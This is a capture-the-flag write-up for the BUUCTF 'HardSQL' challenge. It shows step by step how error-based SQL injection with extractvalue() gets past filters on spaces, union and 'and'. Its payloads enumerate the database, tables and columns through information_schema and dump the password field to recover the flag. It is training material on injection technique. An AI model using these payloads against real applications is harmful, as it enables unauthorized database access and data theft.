BUUCTF——[Geek Challenge 2019]HardSQL

Open the question and perform regular injection, and found that it does not work. Union, spaces and and are filtered. Try extractvalue() to report error injection and start to do the question. It is recommended to use burp to capture the package and do it in the web page. Please wear a pain mask first (be patient when I didn’t say, hehe).
First burst library name:

payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23
Insert picture description here


Get the name of the library and the name of the table:

payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23
Insert picture description here

Explosion list:

payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23
Insert picture description here

Check (password) table:

payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1))))%23
Insert picture description here

It is found here that the flag is not given, but you can use the right(),left()function to view it

payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(right(password,30))from(H4rDsq1))))%23
Insert picture description here

The two are spliced ​​together. When splicing, pay attention to removing the duplicates in the middle, and then you can submit the flag.

Insert picture description here